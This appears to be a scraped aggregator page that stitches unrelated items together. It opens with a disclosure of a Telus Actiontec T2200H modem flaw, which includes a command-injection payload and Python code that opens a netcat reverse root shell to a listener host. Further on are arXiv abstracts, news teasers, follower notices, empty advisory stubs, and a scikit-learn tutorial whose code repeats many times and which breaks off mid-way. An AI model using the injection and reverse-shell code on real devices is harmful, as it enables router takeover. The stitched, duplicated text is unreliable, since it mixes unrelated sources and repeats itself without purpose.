### Device Details Vendor: Actiontec (Telus Branded, but may work on others) Model: T2200H (but likely affecting other similar models of theirs) Affected Firmware: T2200H-31.128L.03 Device Manual: http://ift.tt/1R1TWiC Reported: November 2015 Status: Fixed on newly pushed firmware version CVE: Not needed since update is pushed by the provider. The Telus Actiontec T2200H is Telus’ standard bonded VDSL2 modem. It incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode, 802.11agn wireless, etc. ### Summary of Findings - root shell access can be obtained as long as an attacker has a login to the web UI. The password can always be reset by knowing the device serial number printed on the device, if the default password hasn't been changed. - There are 2 separate firmware partitions (/dev/mtdblock0 and /dev/mtdblock1) that can be mounted read-write and then modified with additional files or configuration - surviving reboots and factory resets. - TR-069 settings can be modified to not check in to the management server. This means that future updates would be impossible without flashing the device locally. ### Running single shell commands Under Advanced Setup > Samba Configuration update either the Samba Username or Password with the following: “;iptables -F”. A USB flash drive needs to be plugged into the USB port on the rear of the modem when running the exploit from the web GUI. Anything run in this field is executed as the root user. Now after running nmap, all listening ports are open: $ nmap -p 1-10000 192.168.1.254 Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-08 22:14 MST Nmap scan report for 192.168.1.254 Host is up (0.016s latency). Not shown: 9991 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 5431/tcp open park-agent 7547/tcp open unknown ### Obtaining reverse root shell Create a netcat session locally: nc -k -l 5555 Next we’ll run the following python code to allow us to pipe /bin/sh back to us. Before running the following python code, you will need to login successfully to the web-ui through http://192.168.1.254. 192.168.1.9 is the IP of the machine listening on netcat. ``` import requests s = requests.session() smb_post = { "action" : "savapply", "smbdEnable" : '1', "smbdPasswd" : "123", "smbdUserid" : ";rm /var/fifo2; mknod /var/fifo2 p", "smbdVolume" : 'usb1_1', "smbdWorkgroup" : "WORKGROUP"} # creating the fifo pipe s.post("http://ift.tt/2bjYExD", smb_post) smb_post["smbdUserid"] = ";cat /var/fifo2 |/bin/sh -i 2>&1 |nc 192.168.1.9 5555 > /var/fifo2" # Using the pipe to send a shell over netcat s.post("http://ift.tt/2bjYExD", smb_post) ``` Your netcat listener should now be prompted with a root busybox shell: $ nc -k -l 5555 BusyBox v1.17.2 (2013-12-27 18:49:15 PST) built-in shell (ash) Enter 'help' for a list of built-in commands. # cat /etc/image_version T2200H-311283BGW0011043 # ### Other Discoveries Mounting root filesystem read+write: `mount -t jffs2 -o remount,rw mtd:rootfs` Mounting partition 2 read-write: `mount -t jffs2 -o rw /dev/mtdblock1 /mnt` To allow unrestricted access of the web features (enabling telnet, firmware flash, TR-069 configuration, etc.) After the root filesystem is mounted read-write: ``` cat /webs/perm.txt | sed ‘s/ 4/ 7/’ | /webs/perm.txt cat /webs/perm2.txt | sed ‘s/ 4/ 7/’ | /webs/perm2.txt killall -HUP httpd ```

Source: Gmail -> IFTTT-> Blogger

An Anonymous User Authentication and Key Agreement Scheme Based on a Symmetric ...

In this paper, we describe how these attacks work, and propose an enhanced anonymous user authentication and key agreement scheme based on a ...

from Google Alert - anonymous http://ift.tt/2bmyFD9
via IFTTT

China Launches World's 1st 'Hack-Proof' Quantum Communication Satellite

China has taken one more step forward towards achieving success in Quantum communication technology. China has launched the world's first quantum communications satellite into orbit aboard a Long March-2D rocket earlier today in order to test the fundamental laws of quantum mechanics at space. 'Hack-Proof' Communications System The satellite, dubbed Quantum Science Satellite, is designed


from The Hacker News http://ift.tt/2bjLBwb
via IFTTT

I have a new follower on Twitter


Carl-G Schimmelmann

Denmark
http://t.co/1OZlLz5z6O
Following: 7520 - Followers: 8195

August 16, 2016 at 12:54AM via Twitter http://twitter.com/TimeXtenderDWA

Human as Spaceship


You are a spaceship soaring through the universe. So is your dog. We all carry with us trillions of microorganisms as we go through life. These multitudes of bacteria, fungi, and archaea have different DNA than you. Collectively called your microbiome, your shipmates outnumber your own cells. Your crew members form communities, help digest food, engage in battles against intruders, and sometimes commute on a liquid superhighway from one end of your body to the other. Much of what your microbiome does, however, remains unknown. You are the captain, but being nice to your crew may allow you to explore more of your local cosmos. via NASA http://ift.tt/2aW739w

Monday, August 15, 2016

I have a new follower on Twitter


Kate Blanchard
Biotech co-founder @ORIG3N_Inc, technology enthusiast, driven to extend lives with regenerative medicine. #boston #ohiostate @kenanflagler
Boston, MA
https://t.co/z9WCZJqJyH
Following: 8988 - Followers: 9872

August 15, 2016 at 10:09PM via Twitter http://twitter.com/KateSBlanchard

I have a new follower on Twitter


Mark Crone
Passionate about #Travel & #Tourism, #TravelTips & #TravelReviews; @UniglobeBizTrvl, @CdnSkiPatrol, contributor @Liftopia, @thehipmunk; #Blogger on my blog:
Toronto, Canada
https://t.co/HmHV6EKbtH
Following: 11355 - Followers: 13901

August 15, 2016 at 10:09PM via Twitter http://twitter.com/MarkTravel

Determining Health Utilities through Data Mining of Social Media. (arXiv:1608.03938v1 [cs.CL])

'Health utilities' measure patient preferences for perfect health compared to specific unhealthy states, such as asthma, a fractured hip, or colon cancer. When integrated over time, these estimations are called quality adjusted life years (QALYs). Until now, characterizing health utilities (HUs) required detailed patient interviews or written surveys. While reliable and specific, this data remained costly due to efforts to locate, enlist and coordinate participants. Thus the scope, context and temporality of diseases examined has remained limited.

Now that more than a billion people use social media, we propose a novel strategy: use natural language processing to analyze public online conversations for signals of the severity of medical conditions and correlate these to known HUs using machine learning. In this work, we filter a dataset that originally contained 2 billion tweets for relevant content on 60 diseases. Using this data, our algorithm successfully distinguished mild from severe diseases, which had previously been categorized only by traditional techniques. This represents progress towards two related applications: first, predicting HUs where such information is nonexistent; and second, (where rich HU data already exists) estimating temporal or geographic patterns of disease severity through data mining.



from cs.AI updates on arXiv.org http://ift.tt/2aXlAlu
via IFTTT

Can Peripheral Representations Improve Clutter Metrics on Complex Scenes?. (arXiv:1608.04042v1 [cs.CV])

Previous studies have proposed image-based clutter measures that correlate with human search times and/or eye movements. However, most models do not take into account the fact that the effects of clutter interact with the foveated nature of the human visual system: visual clutter further from the fovea has an increasing detrimental influence on perception. Here, we introduce a new foveated clutter model to predict the detrimental effects in target search utilizing a forced fixation search task. We use Feature Congestion (Rosenholtz et al.) as our non foveated clutter model, and we stack a peripheral architecture on top of Feature Congestion for our foveated model. We introduce the Peripheral Integration Feature Congestion (PIFC) coefficient, as a fundamental ingredient of our model that modulates clutter as a non-linear gain contingent on eccentricity. We finally show that Foveated Feature Congestion (FFC) clutter scores r(44) = -0.82 correlate better with target detection (hit rate) than regular Feature Congestion r(44) = -0.19 in forced fixation search. Thus, our model allows us to enrich clutter perception research by computing fixation specific clutter maps. A toolbox for creating peripheral architectures: Piranhas: Peripheral Architectures for Natural, Hybrid and Artificial Systems will be made available.



from cs.AI updates on arXiv.org http://ift.tt/2aVsbcP
via IFTTT

A Geometric Framework for Convolutional Neural Networks. (arXiv:1608.04374v1 [stat.ML])

In this paper, a geometric framework for neural networks is proposed. This framework uses the inner product space structure underlying the parameter set to perform gradient descent not in a component-based form, but in a coordinate-free manner. Convolutional neural networks are described in this framework in a compact form, with the gradients of standard --- and higher-order --- loss functions calculated for each layer of the network. This approach can be applied to other network structures and provides a basis on which to create new networks.



from cs.AI updates on arXiv.org http://ift.tt/2aVrn7O
via IFTTT

A Parallel Algorithm for Exact Bayesian Structure Discovery in Bayesian Networks. (arXiv:1408.1664v3 [cs.AI] UPDATED)

Exact Bayesian structure discovery in Bayesian networks requires exponential time and space. Using dynamic programming (DP), the fastest known sequential algorithm computes the exact posterior probabilities of structural features in $O(2(d+1)n2^n)$ time and space, if the number of nodes (variables) in the Bayesian network is $n$ and the in-degree (the number of parents) per node is bounded by a constant $d$. Here we present a parallel algorithm capable of computing the exact posterior probabilities for all $n(n-1)$ edges with optimal parallel space efficiency and nearly optimal parallel time efficiency. That is, if $p=2^k$ processors are used, the run-time reduces to $O(5(d+1)n2^{n-k}+k(n-k)^d)$ and the space usage becomes $O(n2^{n-k})$ per processor. Our algorithm is based the observation that the subproblems in the sequential DP algorithm constitute a $n$-$D$ hypercube. We take a delicate way to coordinate the computation of correlated DP procedures such that large amount of data exchange is suppressed. Further, we develop parallel techniques for two variants of the well-known \emph{zeta transform}, which have applications outside the context of Bayesian networks. We demonstrate the capability of our algorithm on datasets with up to 33 variables and its scalability on up to 2048 processors. We apply our algorithm to a biological data set for discovering the yeast pheromone response pathways.



from cs.AI updates on arXiv.org http://ift.tt/1nxBLRX
via IFTTT

Natural Language Generation enhances human decision-making with uncertain information. (arXiv:1606.03254v2 [cs.CL] UPDATED)

Decision-making is often dependent on uncertain data, e.g. data associated with confidence scores or probabilities. We present a comparison of different information presentations for uncertain data and, for the first time, measure their effects on human decision-making. We show that the use of Natural Language Generation (NLG) improves decision-making under uncertainty, compared to state-of-the-art graphical-based representation methods. In a task-based study with 442 adults, we found that presentations using NLG lead to 24% better decision-making on average than the graphical presentations, and to 44% better decision-making when NLG is combined with graphics. We also show that women achieve significantly better results when presented with NLG output (an 87% increase on average compared to graphical presentations).



from cs.AI updates on arXiv.org http://ift.tt/1UuC2Gc
via IFTTT

Fully DNN-based Multi-label regression for audio tagging. (arXiv:1606.07695v2 [cs.CV] UPDATED)

Acoustic event detection for content analysis in most cases relies on lots of labeled data. However, manually annotating data is a time-consuming task, which thus makes few annotated resources available so far. Unlike audio event detection, automatic audio tagging, a multi-label acoustic event classification task, only relies on weakly labeled data. This is highly desirable to some practical applications using audio analysis. In this paper we propose to use a fully deep neural network (DNN) framework to handle the multi-label classification task in a regression way. Considering that only chunk-level rather than frame-level labels are available, the whole or almost whole frames of the chunk were fed into the DNN to perform a multi-label regression for the expected tags. The fully DNN, which is regarded as an encoding function, can well map the audio features sequence to a multi-tag vector. A deep pyramid structure was also designed to extract more robust high-level features related to the target tags. Further improved methods were adopted, such as the Dropout and background noise aware training, to enhance its generalization capability for new audio recordings in mismatched environments. Compared with the conventional Gaussian Mixture Model (GMM) and support vector machine (SVM) methods, the proposed fully DNN-based method could well utilize the long-term temporal information with the whole chunk as the input. The results show that our approach obtained a 15% relative improvement compared with the official GMM-based method of DCASE 2016 challenge.



from cs.AI updates on arXiv.org http://ift.tt/28X80gY
via IFTTT

CaR-FOREST: Joint Classification-Regression Decision Forests for Overlapping Audio Event Detection. (arXiv:1607.02306v2 [cs.SD] UPDATED)

This report describes our submissions to Task2 and Task3 of the DCASE 2016 challenge. The systems aim at dealing with the detection of overlapping audio events in continuous streams, where the detectors are based on random decision forests. The proposed forests are jointly trained for classification and regression simultaneously. Initially, the training is classification-oriented to encourage the trees to select discriminative features from overlapping mixtures to separate positive audio segments from the negative ones. The regression phase is then carried out to let the positive audio segments vote for the event onsets and offsets, and therefore model the temporal structure of audio events. One random decision forest is specifically trained for each event category of interest. Experimental results on the development data show that our systems significantly outperform the baseline on the Task2 evaluation while they are inferior to the baseline in the Task3 evaluation.



from cs.AI updates on arXiv.org http://ift.tt/29wGQ3s
via IFTTT

Towards Analytics Aware Ontology Based Access to Static and Streaming Data (Extended Version). (arXiv:1607.05351v2 [cs.AI] UPDATED)

Real-time analytics that requires integration and aggregation of heterogeneous and distributed streaming and static data is a typical task in many industrial scenarios such as diagnostics of turbines in Siemens. OBDA approach has a great potential to facilitate such tasks; however, it has a number of limitations in dealing with analytics that restrict its use in important industrial applications. Based on our experience with Siemens, we argue that in order to overcome those limitations OBDA should be extended and become analytics, source, and cost aware. In this work we propose such an extension. In particular, we propose an ontology, mapping, and query language for OBDA, where aggregate and other analytical functions are first class citizens. Moreover, we develop query optimisation techniques that allow to efficiently process analytical tasks over static and streaming data. We implement our approach in a system and evaluate our system with Siemens turbine data.



from cs.AI updates on arXiv.org http://ift.tt/29TO2Et
via IFTTT

Anonymous donor gives trike to disabled man

Ralph Shaffer, 58, was surprised with a new tricycle Friday. An anonymous donor purchased the trike and asked village workers to put it together for ...

from Google Alert - anonymous http://ift.tt/2btUx0I
via IFTTT

NSA's Hacking Group Hacked! Bunch of Private Hacking Tools Leaked Online

It seems like the NSA has been HACKED! An unknown hacker or a group of hackers just claimed to have hacked into "Equation Group" -- a cyber-attack group allegedly associated with the United States intelligence organization NSA -- and dumped a bunch of its hacking tools (malware, private exploits, and hacking tools) online. <!-- adsense --> Not just this, the hackers, calling themselves "The


from The Hacker News http://ift.tt/2aW5gV7
via IFTTT

[FD] Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Link Library WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Ajax Load More Local File Inclusion vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login Redirect WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery vulnerability in Email Users WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Google Maps WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows deleting of images

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows deleting of galleries

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows adding of images

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Ravens: LB Terrell Suggs releases statement after his first practice in 11 months, says "Darth Sizzle is back" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Python Eggs
#python addict
Paris, Ile-de-France

Following: 2141 - Followers: 2655

August 15, 2016 at 12:12PM via Twitter http://twitter.com/PythonEggs

This basically anonymous fund manager oversees $800bn

Take a rare look behind the scenes at an index fund with Vanguard's Gerry O'Reilly, manager of the world's largest mutual fund.

from Google Alert - anonymous http://ift.tt/2bykFuw
via IFTTT

D8: Anonymous users can see unpublished content

... Permission let's anonymous users access unpublished content. "View own unpublished content" is not set for anonymous users. Patch coming.

from Google Alert - anonymous http://ift.tt/2bsGnw5
via IFTTT

How to tune hyperparameters with Python and scikit-learn

tune_hyperparams_header

In last week’s post, I introduced the k-NN machine learning algorithm which we then applied to the task of image classification.

Using the k-NN algorithm, we obtained 57.58% classification accuracy on the Kaggle Dogs vs. Cats dataset challenge:

Figure 1: Classifying an image as whether or contains a dog or a cat.

Figure 1: Classifying an image as whether it contains a dog or a cat.

The question is: “Can we do better?”

Of course we can! Obtaining higher accuracy for nearly any machine learning algorithm boils down to tweaking various knobs and levels.

In the case of k-NN, we can tune k, the number of nearest neighbors. We can also tune our distance metric/similarity function as well.

Of course, hyperparameter tuning has implications outside of the k-NN algorithm as well. In the context of Deep Learning and Convolutional Neural Networks, we can easily have hundreds of various hyperparameters to tune and play with (although in practice we try to limit the number of variables to tune to a small handful), each affecting our overall classification to some (potentially unknown) degree.

Because of this, it’s important to understand the concept of hyperparameter tuning and how your choice in hyperparameters can dramatically impact your classification accuracy.

Looking for the source code to this post?
Jump right to the downloads section.

How to tune hyperparameters with Python and scikit-learn

In the remainder of today’s tutorial, I’ll be demonstrating how to tune k-NN hyperparameters for the Dogs vs. Cats dataset. We’ll start with a discussion on what hyperparameters are, followed by viewing a concrete example on tuning k-NN hyperparameters.

We’ll then explore how to tune k-NN hyperparameters using two search methods: Grid Search and Randomized Search.

As our results will demonstrate, we can improve our classification accuracy from 57.58% to over 64%!

What are hyperparameters?

Hyperparameters are simply the knobs and levels you pull and turn when building a machine learning classifier. The process of tuning hyperparameters is more formally called hyperparameter optimization.

So what’s the difference between a normal “model parameter” and a “hyperparameter”?

Well, a standard “model parameter” is normally an internal variable that is optimized in some fashion. In the context of Linear Regression, Logistic Regression, and Support Vector Machines, we would think of parameters as the weight vector coefficients found by the learning algorithm.

On the other hand, “hyperparameters” are normally set by a human designer or tuned via algorithmic approaches. Examples of hyperparameters include the number of neighbors k in the k-Nearest Neighbor algorithm, the learning rate alpha of a Neural Network, or the number of filters learned in a given convolutional layer in a CNN.

In general, model parameters are optimized according to some loss function, while hyperparameters are instead searched for by exploring various settings to see which values provided the highest level of accuracy.

Because of this, it tends to be easier to tune model parameters (since we’re optimizing some objective function based on our training data) whereas hyperparameters can require a nearly blind search to find optimal ones.

k-NN hyperparameters

As a concrete example of tuning hyperparameters, let’s consider the k-Nearest Neighbor classification algorithm. For your standard k-NN implementation, there are two primary hyperparameters that you’ll want to tune:

  1. The number of neighbors k.
  2. The distance metric/similarity function.

Both of these values can dramatically affect the accuracy of your k-NN classifier. To demonstrate this in the context of image classification, let’s apply hyperparameter tuning to our Kaggle Dogs vs. Cats dataset from last week.

Open up a new file, name it

knn_tune.py
 , and insert the following code:
# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

Lines 2-12 start by importing our required Python packages. We’ll be making heavy use of the scikit-learn library, so if you do not have it installed, make sure you follow these instructions.

We’ll also be using my personal imutils library, so make sure you have it installed as well:

$ pip install imutils

Next, we’ll define our

extract_color_histogram
  function:
# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

This function accepts an input

image
  along with a number of
bins
  for each channel of the image.

We convert the image to the HSV color space and compute a 3D color histogram to characterize the color distribution of the image (Lines 17-19).

This histogram is then flattened into a single 8 x 8 x 8 = 512-d feature vector that is returned to the calling function.

For a more detailed review of this method, please refer to last week’s blog post.

# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

Lines 34-39 handle parsing our command line arguments. We only need two switches here:

  • --dataset
    
     : The path to our input Dogs vs. Cats dataset from the Kaggle challenge.
  • --jobs
    
     : The number of processors/cores to utilize when computing the nearest neighbors for a particular data point. Setting this value to
    -1
    
      indicates all available processors/cores should be used. Again, for a more detailed review of these arguments, please refer to last week’s tutorial.

Line 43 grabs the paths to our 25,000 input images while Lines 46 and 47 initializes the

data
  list (where we’ll store the color histogram extracted from each image) and
labels
  list (either “dog” or “cat” for each input image), respectively.

Next, we can loop over our

imagePaths
  and describe them:
# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

# loop over the input images
for (i, imagePath) in enumerate(imagePaths):
        # load the image and extract the class label (assuming that our
        # path as the format: /path/to/dataset/{class}.{image_num}.jpg
        image = cv2.imread(imagePath)
        label = imagePath.split(os.path.sep)[-1].split(".")[0]

        # extract a color histogram from the image, then update the
        # data matrix and labels list
        hist = extract_color_histogram(image)
        data.append(hist)
        labels.append(label)

        # show an update every 1,000 images
        if i > 0 and i % 1000 == 0:
                print("[INFO] processed {}/{}".format(i, len(imagePaths)))

Line 50 starts looping over each of the

imagePaths
 . For each
imagePath
 , we load it from disk and extract the
label
  (Lines 53 and 54).

Now that we have our

image
 , we compute a color histogram (Line 58), followed by updating the
data
  and
labels
  lists (Lines 59 and 60).

Finally, Lines 63 and 64 display the feature extraction progress to our screen.

In order to train and evaluate our k-NN classifier, we’ll need to partition our

data
  into two splits: a training split and a testing split:
# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

# loop over the input images
for (i, imagePath) in enumerate(imagePaths):
        # load the image and extract the class label (assuming that our
        # path as the format: /path/to/dataset/{class}.{image_num}.jpg
        image = cv2.imread(imagePath)
        label = imagePath.split(os.path.sep)[-1].split(".")[0]

        # extract a color histogram from the image, then update the
        # data matrix and labels list
        hist = extract_color_histogram(image)
        data.append(hist)
        labels.append(label)

        # show an update every 1,000 images
        if i > 0 and i % 1000 == 0:
                print("[INFO] processed {}/{}".format(i, len(imagePaths)))

# partition the data into training and testing splits, using 75%
# of the data for training and the remaining 25% for testing
print("[INFO] constructing training/testing split...")
(trainData, testData, trainLabels, testLabels) = train_test_split(
        data, labels, test_size=0.25, random_state=42)

Here we’ll be using 75% of our data for training and the remaining 25% for evaluation.

Finally, let’s define the set of hyperparameters we are going to optimize over:

# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

# loop over the input images
for (i, imagePath) in enumerate(imagePaths):
        # load the image and extract the class label (assuming that our
        # path as the format: /path/to/dataset/{class}.{image_num}.jpg
        image = cv2.imread(imagePath)
        label = imagePath.split(os.path.sep)[-1].split(".")[0]

        # extract a color histogram from the image, then update the
        # data matrix and labels list
        hist = extract_color_histogram(image)
        data.append(hist)
        labels.append(label)

        # show an update every 1,000 images
        if i > 0 and i % 1000 == 0:
                print("[INFO] processed {}/{}".format(i, len(imagePaths)))

# partition the data into training and testing splits, using 75%
# of the data for training and the remaining 25% for testing
print("[INFO] constructing training/testing split...")
(trainData, testData, trainLabels, testLabels) = train_test_split(
        data, labels, test_size=0.25, random_state=42)

# construct the set of hyperparameters to tune
params = {"n_neighbors": np.arange(1, 31, 2),
        "metric": ["euclidean", "cityblock"]}

The above code block defines a

params
  dictionary which contains two keys:
  • n_neighbors
    
     : The number of nearest neighbors k in the k-NN algorithm. Here we’ll search over the odd integers in the range [0, 29] (keep in mind that the
    np.arange
    
      function is exclusive).
  • metric
    
     : This is the distance function/similarity metric for k-NN. Normally this defaults to the Euclidean distance, but we could also use any function that returns a single floating point value representing how “similar” two images are. In this case, we’ll search over both the Euclidean distance and Manhattan/City block distance.

Now that we have defined the hyperparameters we want to search over, we need a method that actually applies the search. Luckily, the scikit-learn library already has two methods that can perform hyperparameter search for us: Grid Search and Randomized Search.

As we’ll find out, it’s normally preferable to used Randomized Search over Grid Search in nearly all circumstances.

Grid Search hyperparameters

The Grid Search tuning algorithm will methodically (and exhaustively) train and evaluate a machine learning classifier for each and every combination of hyperparameter values.

In this case, given 16 unique values of k and 2 unique values for our distance metric, a Grid Search will apply 30 different experiments to determine the optimal value.

You can see how a Grid Search is performed in the following code segment:

# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

# loop over the input images
for (i, imagePath) in enumerate(imagePaths):
        # load the image and extract the class label (assuming that our
        # path as the format: /path/to/dataset/{class}.{image_num}.jpg
        image = cv2.imread(imagePath)
        label = imagePath.split(os.path.sep)[-1].split(".")[0]

        # extract a color histogram from the image, then update the
        # data matrix and labels list
        hist = extract_color_histogram(image)
        data.append(hist)
        labels.append(label)

        # show an update every 1,000 images
        if i > 0 and i % 1000 == 0:
                print("[INFO] processed {}/{}".format(i, len(imagePaths)))

# partition the data into training and testing splits, using 75%
# of the data for training and the remaining 25% for testing
print("[INFO] constructing training/testing split...")
(trainData, testData, trainLabels, testLabels) = train_test_split(
        data, labels, test_size=0.25, random_state=42)
